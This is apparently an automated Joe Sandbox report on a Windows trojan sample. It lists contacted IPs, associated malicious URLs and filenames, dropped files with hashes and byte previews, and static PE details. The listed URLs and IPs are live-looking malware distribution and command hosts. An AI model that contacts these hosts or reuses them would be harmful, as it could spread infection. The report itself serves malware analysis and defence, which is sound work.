                                                                                                              46606UNIFIEDLAYER-AS-1UStrue
                                                                                                              185.142.236.163
                                                                                                              unknownNetherlands
                                                                                                              174COGENT-174UStrue
                                                                                                              79.143.178.194
                                                                                                              unknownGermany
                                                                                                              51167CONTABODEfalse
                                                                                                              73.55.128.120
                                                                                                              unknownUnited States
                                                                                                              7922COMCAST-7922UStrue
                                                                                                              178.254.36.182
                                                                                                              unknownGermany
                                                                                                              42730EVANZOASDEtrue
                                                                                                              200.243.153.66
                                                                                                              unknownBrazil
                                                                                                              4230CLAROSABRtrue
                                                                                                              91.83.93.103
                                                                                                              unknownHungary
                                                                                                              12301INVITECHHUtrue
                                                                                                              195.201.56.70
                                                                                                              unknownGermany
                                                                                                              24940HETZNER-ASDEtrue

                                                                                                              Private

                                                                                                              IP
                                                                                                              192.168.2.1
                                                                                                              127.0.0.1

                                                                                                              General Information

                                                                                                              Joe Sandbox Version:31.0.0 Emerald
                                                                                                              Analysis ID:356776
                                                                                                              Start date:23.02.2021
                                                                                                              Start time:16:27:44
                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                              Overall analysis duration:0h 14m 27s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:light
                                                                                                              Sample file name:MV9tCJw8Xr (renamed file extension from none to exe)
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                              Number of analysed new started processes analysed:39
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • HDC enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.troj.evad.winEXE@42/7@0/100
                                                                                                              EGA Information:Failed
                                                                                                              HDC Information:
                                                                                                              • Successful, ratio: 36.8% (good quality ratio 35.4%)
                                                                                                              • Quality average: 78.4%
                                                                                                              • Quality standard deviation: 26.2%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 77%
                                                                                                              • Number of executed functions: 0
                                                                                                              • Number of non-executed functions: 0
                                                                                                              Cookbook Comments:
                                                                                                              • Adjust boot time
                                                                                                              • Enable AMSI
                                                                                                              Warnings:
                                                                                                              Show All
                                                                                                              • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
                                                                                                              • TCP Packets have been reduced to 100
                                                                                                              • Excluded IPs from analysis (whitelisted): 13.64.90.137, 23.211.6.115, 52.255.188.83, 104.43.139.144, 52.147.198.201, 184.30.24.56, 51.11.168.160, 2.20.142.210, 2.20.142.209, 51.103.5.186, 92.122.213.194, 92.122.213.247, 52.155.217.156, 20.54.26.129
                                                                                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                              Simulations

                                                                                                              Behavior and APIs

                                                                                                              TimeTypeDescription
                                                                                                              16:28:48API Interceptor12x Sleep call for process: svchost.exe modified
                                                                                                              16:29:55API Interceptor43x Sleep call for process: tokenbinding2.exe modified
                                                                                                              16:30:00API Interceptor19x Sleep call for process: KBDHEB.exe modified
                                                                                                              16:30:02API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                              16:30:03API Interceptor42x Sleep call for process: execmodelproxy.exe modified
                                                                                                              16:30:07API Interceptor18x Sleep call for process: COLORCNV.exe modified
                                                                                                              16:30:10API Interceptor16x Sleep call for process: usp10.exe modified
                                                                                                              16:30:13API Interceptor16x Sleep call for process: KBDINTAM.exe modified
                                                                                                              16:30:15API Interceptor16x Sleep call for process: msrd2x40.exe modified
                                                                                                              16:30:17API Interceptor56x Sleep call for process: MCCSEngineShared.exe modified
                                                                                                              16:30:23API Interceptor15x Sleep call for process: jscript9.exe modified
                                                                                                              16:30:25API Interceptor20x Sleep call for process: wmvdspa.exe modified
                                                                                                              16:30:27API Interceptor24x Sleep call for process: msvcr100_clr0400.exe modified
                                                                                                              16:30:32API Interceptor52x Sleep call for process: catsrvut.exe modified
                                                                                                              16:30:37API Interceptor6x Sleep call for process: mprdim.exe modified

                                                                                                              Joe Sandbox View / Context

                                                                                                              IPs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              183.91.3.63Payment Advice Note ZRC-2020 (1).docGet hashmaliciousBrowse
                                                                                                                78.90.78.210R61XWXC9k8.exeGet hashmaliciousBrowse
                                                                                                                • 78.90.78.210/0VYXuszjjV9agbWXA/UsGPucg8JiPZ8n9Rjia/
                                                                                                                143.95.101.72Payment Advice Note ZRC-2020 (1).docGet hashmaliciousBrowse
                                                                                                                • 143.95.101.72:8080/Jto4JiPoOoGxpvR0u

                                                                                                                Domains

                                                                                                                No context

                                                                                                                ASN

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                GIGAINFRASoftbankBBCorpJPIo8ic2291n.docGet hashmaliciousBrowse
                                                                                                                • 60.93.23.51
                                                                                                                mozi.a.zipGet hashmaliciousBrowse
                                                                                                                • 126.172.220.14
                                                                                                                yVn2ywuhEC.exeGet hashmaliciousBrowse
                                                                                                                • 126.142.30.153
                                                                                                                WUHU95Apq3Get hashmaliciousBrowse
                                                                                                                • 126.248.249.117
                                                                                                                bin.shGet hashmaliciousBrowse
                                                                                                                • 221.65.136.75
                                                                                                                oHqMFmPndx.exeGet hashmaliciousBrowse
                                                                                                                • 221.65.97.214
                                                                                                                mssecsvr.exeGet hashmaliciousBrowse
                                                                                                                • 218.126.250.41
                                                                                                                mssecsvc.exeGet hashmaliciousBrowse
                                                                                                                • 219.38.241.57
                                                                                                                iGet hashmaliciousBrowse
                                                                                                                • 126.3.151.91
                                                                                                                Mozi.mGet hashmaliciousBrowse
                                                                                                                • 220.42.145.217
                                                                                                                NormhjTcQb.exeGet hashmaliciousBrowse
                                                                                                                • 219.7.160.234
                                                                                                                xJbFpiVs1lGet hashmaliciousBrowse
                                                                                                                • 126.168.139.190
                                                                                                                SecuriteInfo.com.Trojan.BtcMine.3311.17146.exeGet hashmaliciousBrowse
                                                                                                                • 60.130.86.188
                                                                                                                RB1NsQ9LQf.exeGet hashmaliciousBrowse
                                                                                                                • 219.40.58.2
                                                                                                                QtieMVP6yx.exeGet hashmaliciousBrowse
                                                                                                                • 60.125.114.64
                                                                                                                8jpKEFc5Ow.exeGet hashmaliciousBrowse
                                                                                                                • 60.125.114.64
                                                                                                                0ZAAMcf57j.exeGet hashmaliciousBrowse
                                                                                                                • 60.125.114.64
                                                                                                                mssecsvc.exeGet hashmaliciousBrowse
                                                                                                                • 126.24.86.250
                                                                                                                uLZjwyI1Kl.exeGet hashmaliciousBrowse
                                                                                                                • 60.125.114.64
                                                                                                                IjM6lDVS1Q.exeGet hashmaliciousBrowse
                                                                                                                • 60.125.114.64
                                                                                                                OCNNTTCommunicationsCorporationJPnetworkmanagerGet hashmaliciousBrowse
                                                                                                                • 223.216.42.27
                                                                                                                yVn2ywuhEC.exeGet hashmaliciousBrowse
                                                                                                                • 118.14.200.58
                                                                                                                WUHU95Apq3Get hashmaliciousBrowse
                                                                                                                • 180.24.91.44
                                                                                                                bin.shGet hashmaliciousBrowse
                                                                                                                • 153.158.34.130
                                                                                                                fil1Get hashmaliciousBrowse
                                                                                                                • 153.145.15.179
                                                                                                                mssecsvc.exeGet hashmaliciousBrowse
                                                                                                                • 180.55.191.70
                                                                                                                SCAN_20210112140930669.exeGet hashmaliciousBrowse
                                                                                                                • 210.145.8.133
                                                                                                                Mozi.mGet hashmaliciousBrowse
                                                                                                                • 210.163.103.147
                                                                                                                svchost.exeGet hashmaliciousBrowse
                                                                                                                • 153.198.99.66
                                                                                                                utox.exeGet hashmaliciousBrowse
                                                                                                                • 153.128.43.119
                                                                                                                fdwv4hWF1M.exeGet hashmaliciousBrowse
                                                                                                                • 165.241.109.96
                                                                                                                SecuriteInfo.com.Trojan.BtcMine.3311.17146.exeGet hashmaliciousBrowse
                                                                                                                • 153.201.75.182
                                                                                                                http://218.44.255.241/wp-includes/js/nri.exeGet hashmaliciousBrowse
                                                                                                                • 218.44.255.241
                                                                                                                RB1NsQ9LQf.exeGet hashmaliciousBrowse
                                                                                                                • 123.224.100.111
                                                                                                                oC636XTURl.exeGet hashmaliciousBrowse
                                                                                                                • 125.200.20.233
                                                                                                                wRZQL3Nel2.exeGet hashmaliciousBrowse
                                                                                                                • 125.200.20.233
                                                                                                                CHbIs67FQm.exeGet hashmaliciousBrowse
                                                                                                                • 125.200.20.233
                                                                                                                FhUuc5CCLj.exeGet hashmaliciousBrowse
                                                                                                                • 125.200.20.233
                                                                                                                EEqMpQZfeh.exeGet hashmaliciousBrowse
                                                                                                                • 118.7.227.42
                                                                                                                8uOajLllk2.exeGet hashmaliciousBrowse
                                                                                                                • 114.146.222.200
                                                                                                                CMCTELECOM-AS-VNCMCTelecomInfrastructureCompanyVNDfES2eBy48.exeGet hashmaliciousBrowse
                                                                                                                • 115.146.127.254
                                                                                                                6rR1G3EcvT3djII.exeGet hashmaliciousBrowse
                                                                                                                • 203.171.27.187
                                                                                                                gupd.exeGet hashmaliciousBrowse
                                                                                                                • 183.91.25.185
                                                                                                                https://baocaotaichinh.vn/thu-vien/file-excel-hop-dong-lao-dong--phu-luc-hdlt--mau-cam-ket-02--quyet-dinh-tang-luong-1485755241-157Get hashmaliciousBrowse
                                                                                                                • 103.63.115.9
                                                                                                                networkserviceGet hashmaliciousBrowse
                                                                                                                • 103.224.169.252

                                                                                                                JA3 Fingerprints

                                                                                                                No context

                                                                                                                Dropped Files

                                                                                                                No context

                                                                                                                Created / dropped Files

                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4096
                                                                                                                Entropy (8bit):0.5864234280410656
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:bQrMk1GaD0JOCEfMuaaD0JOCEfMKQmDA3utAl/gz2cE0fMbhEZolrRSQ2hyYIIT:b4TGaD0JcaaD0JwQQ5tAg/0bjSQJ
                                                                                                                MD5:420636F9F27FD67F2C6D94A15CFD1BE9
                                                                                                                SHA1:EC324F4C9C6CA982825B4922E3B4303DF27007BC
                                                                                                                SHA-256:8FAD09D70E9C7785CD11E63AD669C0D717827C0B037109BA80CD0D64551F8A04
                                                                                                                SHA-512:80CBE485AE72155A9EBA794BA1599DD020FCE93C519DDF4BB189DAEB5E143C2D45148A0BD4FF2C0B320EC9B0D46132B0F88F04649F95ED8E8B14729F65A93F3D
                                                                                                                Malicious:false
                                                                                                                Preview: ....E..h..(.....1....yu.............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................1....yu...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0xcbb7ecd7, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                Category:dropped
                                                                                                                Size (bytes):32768
                                                                                                                Entropy (8bit):0.09296066254794608
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:LmGzwl/+V3Nlk1RIE11Y8TRX6J/ljtUKlmGzwl/+V3Nlk1RIE11Y8TRX6J/ljtUK:LmG0+VMO4bl6NUKlmG0+VMO4bl6NUK
                                                                                                                MD5:4F3FDB8E42C9C4F83D5568E6993FF453
                                                                                                                SHA1:F5CE02E5E8C22BCBA79FD32335C8229861251A25
                                                                                                                SHA-256:53EE3B7FD8EE66E56512CEE7A6E9A306DF023433CB5D3C1A4F804E608896BF30
                                                                                                                SHA-512:C819A0AC6ADA078C985E30DB40F476B6DF6E29C6229E527D5B7C75818465EC91B03B892A5557EA0F333CCEC931B4A258621DABB343E2A6D9E644B00826892789
                                                                                                                Malicious:false
                                                                                                                Preview: ...... ................e.f.3...w........................&..........w..1....yu.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................F...1....yu...................q.1....yu.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):8192
                                                                                                                Entropy (8bit):0.10614204105255072
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:O2X7EvU5h2i8l/bJdAti/7FcQtYll:dXiU98t4AtI
                                                                                                                MD5:94B2529699E7B2E7196E10F4B8D6B6BF
                                                                                                                SHA1:61591CCC9C93B64B4BF8007B013E30ADC20C3151
                                                                                                                SHA-256:92E5DEEC578308C13DB6FF2422705873E61198165B5B6AB3C0081DF1D218A220
                                                                                                                SHA-512:B48C8183C9EA05D8321035CA8C0437F12C9EC57F26CE7EA05317A6DB7C7D3A68D4E63F95321A1F81652D13C729EE3FD0708536901599C130A93CFD24C65148BC
                                                                                                                Malicious:false
                                                                                                                Preview: ...N.....................................3...w..1....yu......w...............w.......w....:O.....w....................q.1....yu.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                C:\Users\user\AppData\Local\Temp\UPDA7CE.tmp
                                                                                                                Process:C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe
                                                                                                                File Type:data
                                                                                                                Category:modified
                                                                                                                Size (bytes):262176
                                                                                                                Entropy (8bit):7.999303000257025
                                                                                                                Encrypted:true
                                                                                                                SSDEEP:6144:rWZlYSZmYrMEbTOagpAdQQcBsCmL0/LX6PRa0kaud2OZVubg:rIlYSQYIEmDIQQcOCmL0/DGGH8a6g
                                                                                                                MD5:23B7DE7DF2C2A0C72E5D8A016DC56CEA
                                                                                                                SHA1:7FF40DCB94F3084E6432EE086925A1D9C51FA0FE
                                                                                                                SHA-256:8F46B2FBCE6EC7968D5A8FC7B1C8B4255EE0D1BBA75C05BDBB18433F4A28FFAD
                                                                                                                SHA-512:B945A9A4896639A160251CB322ACB900EE0EC6F8231F7BED7171AFA6ACF2092ABAAE16756758AB452AB212279DED1A004DA892BAAC729082E8B500497765E9FE
                                                                                                                Malicious:false
                                                                                                                Preview: ....cE,.w;..$d......*H.8Hh.<...........J....?.[...?._.C;.j.1..O*u.g}z.....b.8.5.A.L..<)>r.V.q ........|2.a..E...}..i,f-.!.`.X........+n..`GB.).4........E.....cH\..Z3.....V....3...u.......e-..<..(.m_..0"....+.jZ^.H-...)V....k.$r'....Ye..Tp.>.../2.I.NK...j.@........>..!....px7l..A.r.1b..B.=K........19+K.....c..z9..<.{....$.....\.3..<Y=...KC.w.Twm......J.....X.!.q.l~#$.W....K.m...2Hp....B.cc{.c.X...A.*..Dk:.w^..v...{.,.......x......O.`i,D..s....C.J..4c@B....>.'...!:H.3.j.h....@..|..L.r......'..+....ku.:...>..?j{t{..L.j..|.<9Z............~\5.;.4%<|.}WntU.VV.kw...*n..`..M.>T.7.fN=w.f-...6...Ix4B.j5..Z..P._., ...C.1..1aW.".DJxX....r..;Ft.{...J.m..q.O1..2..n..L..5O...K..`d*b....p.0.t.O..W...5.l;TZ./,.K..J...Y-q(..8h;...[......A.....y.@y...f_5{...Yv8O4..C..=`S*.!.....0....Dr.t.\..SS.9p...k.].g....7h Z..bBH.a..c.....e...q .KNV^..0...~{z.4.ok.6.ON.'H.;e%.8:..(!7_.$.#...<....$g...J...l......B#...~Jt...l..%.i..1.?.A8.P......*}..|..F..@..
                                                                                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):55
                                                                                                                Entropy (8bit):4.306461250274409
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                Malicious:false
                                                                                                                Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                                Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                File Type:data
                                                                                                                Category:modified
                                                                                                                Size (bytes):906
                                                                                                                Entropy (8bit):3.1423056238932134
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:58KRBubdpkoF1AG3ru0mNok9+MlWlLehB4yAq7ejCL0mNB:OaqdmuF3rUNL+kWReH4yJ7MsNB
                                                                                                                MD5:CDF2B381C7083CB8BC135D000B5D03EC
                                                                                                                SHA1:B4933AE30C306BC37E0DD024F3952EBAFC743B80
                                                                                                                SHA-256:799D61805BAA245FFDE0AC0069FC4928D743432C0A6609C41EAA0D4CA001B9B6
                                                                                                                SHA-512:D2AADDCDD4E0C06C97958FB0E26ED863BAC0D6FE378B97668856F17B59F8137617B2F689B7730D6BABE0DBCA153154BF3EC3EC9B00C8B30D66271171EA51482A
                                                                                                                Malicious:false
                                                                                                                Preview: ........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.u.e. .. F.e.b. .. 2.3. .. 2.0.2.1. .1.6.:.3.0.:.0.2.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.u.e. .. F.e.b. .. 2.3. .. 2.0.2.1. .1.6.:.3.0.:.0.2.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
                                                                                                                C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe
                                                                                                                Process:C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):662528
                                                                                                                Entropy (8bit):7.405248515976969
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:67IjOJaW6GOcfJeSdwiGPdIGabyhkOl0Rv1:6868RBcfkSd+dIGa2hkpN1
                                                                                                                MD5:13B9D586BB973AC14BFA24E4AE7B24F1
                                                                                                                SHA1:A5653EBE4FA9F906554E56F4D732489189C3A3F9
                                                                                                                SHA-256:90E4F02AB9157F389D785C3DCDDFA432085B237F2A4C3BEFB4A093D0F2711B5B
                                                                                                                SHA-512:517B1728AC24A587C6A4CCB7C0EA18F2059609958EB06F06107EFD5A2E06FAF0CAA78C49F252E8B2E602A88DE194E7EDB1F4AAF1EFE423298E94257C3DF902AE
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: Metadefender, Detection: 59%, Browse
                                                                                                                • Antivirus: ReversingLabs, Detection: 93%
                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........N..@...@...@.y{....@.y{..P.@.y{....@...C...@...E...@...D...@......@...A.G.@.i.I...@.i.....@.......@.i.B...@.Rich..@.........PE..L....h.`.....................:.......o............@..........................`............@.................................$y...........r...................0..@!...[..8............................\..@............................................text...\........................... ..`.rdata.............................@..@.data................v..............@....rsrc....r.......t..................@..@.reloc..@!...0..."..................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                Static File Info

                                                                                                                General

                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Entropy (8bit):6.645626437400774
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                File name:MV9tCJw8Xr.exe
                                                                                                                File size:262144
                                                                                                                MD5:b12817c1c8ba085a7a82655fba90e53d
                                                                                                                SHA1:1f56268ada7ef3e7b788121cfa2ca1879cf70f1e
                                                                                                                SHA256:61e37534bfb2acbb787788100b1932f5011cbc98db86ce10b7a8a730d2a4de35
                                                                                                                SHA512:788a14c7f1bd001650f9eb01f9d7031bd99853bbb4de5a62b88c4c28bf60f5118a5b6884387c8880388dd3ba78b87caa312e3b82f8351db41befbb8b76aac672
                                                                                                                SSDEEP:3072:2mxrb7sso1HoShS2HMulmfuLjQaWtpbVKF7iqaiNWLKtOw+P2TwXRVoQoedsfVYp:hgp1lhS2HzmfuvMpAF7ihAL+Kpe0YcJ+
                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./.ozk..)k..)k..)..^)l..)..\)~..)k..)...)L<|)r..)L<l)...)L<o)...)L<})j..)L<y)j..)Richk..)........................PE..L....|.^...

                                                                                                                File Icon

                                                                                                                Icon Hash:71b018ccc6577131

                                                                                                                Static PE Info

                                                                                                                General

                                                                                                                Entrypoint:0x412929
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                                                                                                DLL Characteristics:
                                                                                                                Time Stamp:0x5EDA7CAD [Fri Jun 5 17:11:09 2020 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:4
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:4
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:4
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:e422d76403c4c9011b9b8b6b69b469b3

                                                                                                                Entrypoint Preview

                                                                                                                Instruction
                                                                                                                call 00007FD6E0B49C9Dh
                                                                                                                jmp 00007FD6E0B43B0Bh
                                                                                                                push 00000000h
                                                                                                                push dword ptr [esp+14h]
                                                                                                                push dword ptr [esp+14h]
                                                                                                                push dword ptr [esp+14h]
                                                                                                                push dword ptr [esp+14h]
                                                                                                                call 00007FD6E0B49D15h
                                                                                                                add esp, 14h
                                                                                                                ret
                                                                                                                mov eax, dword ptr [esp+04h]
                                                                                                                xor ecx, ecx
                                                                                                                cmp eax, dword ptr [0042EBC8h+ecx*8]
                                                                                                                je 00007FD6E0B43D04h
                                                                                                                inc ecx
                                                                                                                cmp ecx, 2Dh
                                                                                                                jl 00007FD6E0B43CE3h
                                                                                                                lea ecx, dword ptr [eax-13h]
                                                                                                                cmp ecx, 11h
                                                                                                                jnbe 00007FD6E0B43CFEh
                                                                                                                push 0000000Dh
                                                                                                                pop eax
                                                                                                                ret
                                                                                                                mov eax, dword ptr [0042EBCCh+ecx*8]
                                                                                                                ret
                                                                                                                add eax, FFFFFF44h
                                                                                                                push 0000000Eh
                                                                                                                pop ecx
                                                                                                                cmp ecx, eax
                                                                                                                sbb eax, eax
                                                                                                                and eax, ecx
                                                                                                                add eax, 08h
                                                                                                                ret
                                                                                                                call 00007FD6E0B48BC2h
                                                                                                                test eax, eax
                                                                                                                jne 00007FD6E0B43CF8h
                                                                                                                mov eax, 0042ED30h
                                                                                                                ret
                                                                                                                add eax, 08h
                                                                                                                ret
                                                                                                                call 00007FD6E0B48BAFh
                                                                                                                test eax, eax
                                                                                                                jne 00007FD6E0B43CF8h
                                                                                                                mov eax, 0042ED34h
                                                                                                                ret
                                                                                                                add eax, 0Ch
                                                                                                                ret
                                                                                                                push esi
                                                                                                                call 00007FD6E0B43CDCh
                                                                                                                mov ecx, dword ptr [esp+08h]
                                                                                                                push ecx
                                                                                                                mov dword ptr [eax], ecx
                                                                                                                call 00007FD6E0B43C82h
                                                                                                                pop ecx
                                                                                                                mov esi, eax
                                                                                                                call 00007FD6E0B43CB5h
                                                                                                                mov dword ptr [eax], esi
                                                                                                                pop esi
                                                                                                                ret
                                                                                                                call 00007FD6E0B47516h
                                                                                                                push dword ptr [esp+04h]
                                                                                                                call 00007FD6E0B4736Dh
                                                                                                                push dword ptr [0042ED38h]
                                                                                                                call 00007FD6E0B489E3h
                                                                                                                push 000000FFh
                                                                                                                call eax
                                                                                                                add esp, 0Ch

                                                                                                                Rich Headers

                                                                                                                Programming Language:
                                                                                                                • [RES] VS2005 build 50727
                                                                                                                • [ C ] VS2005 build 50727
                                                                                                                • [LNK] VS2005 build 50727
                                                                                                                • [C++] VS2005 build 50727
                                                                                                                • [ASM] VS2005 build 50727

                                                                                                                Data Directories

                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x2c7340xa0.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000xf2d4.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x28cb00x40.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x250000x40c.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x2c6ac0x40.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                Sections

